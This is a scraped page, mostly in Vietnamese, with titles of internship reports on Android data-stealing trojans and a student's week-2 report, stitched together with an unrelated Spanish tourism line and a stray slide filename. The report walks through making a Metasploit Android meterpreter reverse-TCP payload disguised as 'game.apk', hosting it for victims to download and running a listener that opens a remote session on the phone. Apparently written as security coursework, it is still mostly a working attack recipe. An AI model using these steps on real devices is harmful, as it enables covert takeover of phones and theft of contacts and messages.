en la ruta pie de monte llanero, puedes disfrutar de varios lugares turísticos como ocarros, centro agroecologico la cosmopolitana, las termales y probar la gastronomia como el pande arroz y los asaderos tipicos de carne llanera,
Báo cao thực tập Athena tuần 3,4 :
Đề tài : Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC:
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Chương 3 Linh kien ban dan và KD dien tu - Copy.ppt
Bao cao tuan 2
1. Ngô Hoàng Phương – 51104460
Báo cáo tuần 2
Tạo mã độc và tấn công trên Kalilinux.
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali
Linux bằng Virtualbox, đầu tiên ta thiết lập phần Network như sau:
Bước 1: Cài đặt mạng cho kalilinux.
Khởi động máy ảo, vào menu Machine->Setting , chọn thẻ Network.
Chọn cấu hình mạng phù hợp, ở đây ta chọn mạng Briged Adapter và card
mạng lan đang sử dụng, sau đó khởi động kalilinux,
2. Bước 2: Mở Console, gõ lệnh ifconfig để xem địa chỉ IP,
Bước 3: Tạo mã độc:
Gõ lệnh :
Msfpayload android/meterpreter/reverse_tcp lhost=<IP > lport=4444 R >
~/Desktop/game.apk
3. Thông số lhost chính là IP của máy attacker, còn lport là port listening của máy
attacker, có thể chọn port khác, không nên chọn các port thường dùng vì dễ
đụng cổng, còn game.apk chính tên file mã độc.
File apk sẽ được tạo ra ngoài desktop, đây chính là metasploit reverse_tcp
backdoor, ta copy vào thư mục var/www và khởi động webserver để share file
apk, ở victim sẽ vào địa chỉ http://<IP_attacker>/<filename>.apk để tải về.
Bước 4: Tấn công:
- Khởi động metasploit bằng lệnh msfconsole.
4. - Sau khi load msfconsole load xong, ta phải tao một handler để xử lý dữ liệu
truyền về bằng các lệnh sau :
use exploit/multi/handler => chọn handle để xử lý dữ liệu truyền về
set payload android/meterpreter/reverse_tcp => chọn payload tương
tự như lúc tạo mã độc
set lhost 192.168.10.104 => đây là IP của máy kalilinux như tạo mã độc.
set lport 4444 => port giống như tạo mã độc ở trên
exploit => bắt đầu tấn công
5. - Chờ máy victim tải file apk về cài đặt và chạy …
Bước 5: Tấn công:
Trên máy android, vào trình duyệt, truy cập vào địa chỉ
http://<ipattacker>/game.apk, tải file về và cài đặt, sau khi run ta có giao diện
sau:
- Tải mã độc trên android
- Cài đặt mã độc trên Android:
6. Khi đó, trên kali sẽ có 1 session được mở ra, tại đây chúng ta đã có thể xâm
nhập vào máy android.